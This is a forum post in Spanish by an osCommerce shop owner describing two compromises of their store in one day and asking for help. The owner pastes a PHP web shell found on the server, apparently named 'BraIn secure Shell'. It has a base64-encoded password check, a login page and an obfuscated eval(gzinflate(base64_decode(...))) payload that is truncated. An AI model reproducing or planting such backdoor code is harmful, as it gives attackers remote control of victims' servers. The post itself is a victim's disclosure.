Me han hackeado mi OsCommerce dos veces en un día.
Parece que se trata de un script automático de un tal ..:: BraIn Inc™ `09 ::.. he buscado en google pero no me aparece nada.
El caso es que en primera instancia me modificaron los títulos de las categorías de la izq (nose como), si con inyección de SQL o que…
Y en segundo, me han machacado el indez redirigiéndomelo a una página rarísima…
Mirando he visto un fichero que crea una sesión rarísima… lo dejo por aquí.
Código PHP:
<?php
@session_start();
$create_password = true;
$password = base64_decode("YnJAaW5AaGFjazNyLmMwbQ==");$pass=$_POST['pass'];if($pass==$password){$_SESSION['mailer']="$pass";}
if ($_SERVER["HTTP_CLIENT_IP"]) $ip = $_SERVER["HTTP_CLIENT_IP"];
else if($_SERVER["HTTP_X_FORWARDED_FOR"]) $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];
else if($_SERVER["REMOTE_ADDR"]) $ip = $_SERVER["REMOTE_ADDR"];
else $ip = $_SERVER['REMOTE_ADDR'];
$ip=htmlspecialchars($ip);
if($create_password==true){
if(!isset($_SESSION['mailer']) or $_SESSION['mailer']!=$password){
die("<title>..:: BraIn Inc™ `09 ::..</title>
<META http-equiv=\"content-type\" content=\"text/html;charset=iso-8859-1\">
<META content=\"mailer\" name=\"author\">
<META name=\"rating\" content=\"general\" />
<META http-equiv=\"pragma\" content=\"cache\" />
<META http-equiv=\"cache-control\" content=\"cache\" />
<META http-equiv=\"cache-control\" content=\"must-revalidate\" />
<META http-equiv=\"cache-control\" content=\"proxy-revalidate\" />
<META name=\"MSSmartTagsPreventParsing\" content=\"true\" />
<META name=\"robots\" content=\"all,index,follow\" />
<META name=\"googlebot\" content=\"all,index,follow\" />
<META name=\"allow-search\" content=\"yes\" />
<META name=\"audience\" content=\"all\" />
<META name=\"revisit\" content=\"2 days\" />
<META name=\"revisit-after\" content=\"2 days\" />
<META name=\"author\" content=\"mailer\" />
<META name=\"copyright\" content=\"mailer\" />
<META name=\"creator\" content=\"mailer\" />
<META name=\"generator\" content=\"mailer\" />
<META http-equiv=\"Reply-to\" content=\"[email protected]\" />
<META name=\"distribution\" content=\"global\" />
<META name=\"classification\" content=\"..:: BraIn Inc™ `09 ::.., Powered by mailer\" />
<META name=\"document-classification\" content=\"general\" />
<META name=\"rating\" content=\"general\" />
<meta name=\"description\" content=\"..:: BraIn Inc™ `09 ::.. Powered by mailer\" />
<META content=\"index, follow\" name=\"robots\">
<META content=\"..:: BraIn Inc™ `09 ::..,mailer\" name=\"keywords\">
<META name=\"dc.title\" content=\"..:: BraIn Inc™ `09 ::..\" />
<META name=\"dc.creator.e-mail\" content=\"[email protected]\" />
<META name=\"dc.creator.name\" content=\"mailer\" />
<body text=\"#FFFFFF\" bgcolor=\"#000000\" background=\"black\">
<br><br><br><br><br><br><br><br><br><br><br><center>
<table width=100 bgcolor=\"black\" border=1 bordercolor=\"white\"><tr><td>
<font size=1 face=verdana><center><b><font color=red>
..:: BraIn secure Shell ::..</font></a><br><br></b></center>
<form method=post>Password:<br><input type=password name=pass size=30 tabindex=1>
</form><font color=red><b>Host:</b> ".$_SERVER["HTTP_HOST"]."<br>
<font color=red><b>IP:</b> ".gethostbyname($_SERVER["HTTP_HOST"])."<br>
<font color=red><b>Your ip:</b> ".$ip."</td></tr></table>");}}
eval(gzinflate(base64_decode('7X1rcxs5kuBnd0T/B7ia3STHfMpv0ZQt62G7bUtqS7bbLSkYRVaRKqvIoquKomS378fdP7iIi7ivHRM3sb1zOzM7s3EXd3EXsZeZeBTqRVKy7JnZXblbIgFkIpEAEolEIuGMnE5gh6Wi5QRj1zzr2L7v+UGxwprl1tdfOcnsIDT9cDJOFKNvHd8ee37ojAaljc7qs2eYUa8/cAYjz7c7k8D2O2YXCpT2XrzcwMwHgLkTOkO74zpDJyw1VOLQHDi9zruJF9pBx5+MsJDIVhTxOl1vUKxsveS1RZmQrEhMwA3N0459avcmoeONqHpR5OuvCs6YtVmhs7vx4tXGi/3ii43n23vQlvX1F8VDXsJ0XW8K8OGVK21m+r55BhjPgnduscL/OvChH47hd2/iY6ozNPFb4PWO7TDAYgEvjoVDu4hVC7Rj3xv45jDCPOj1EBH+ci34NT5CVGObEINY5bp/w8=' .............. )))
?>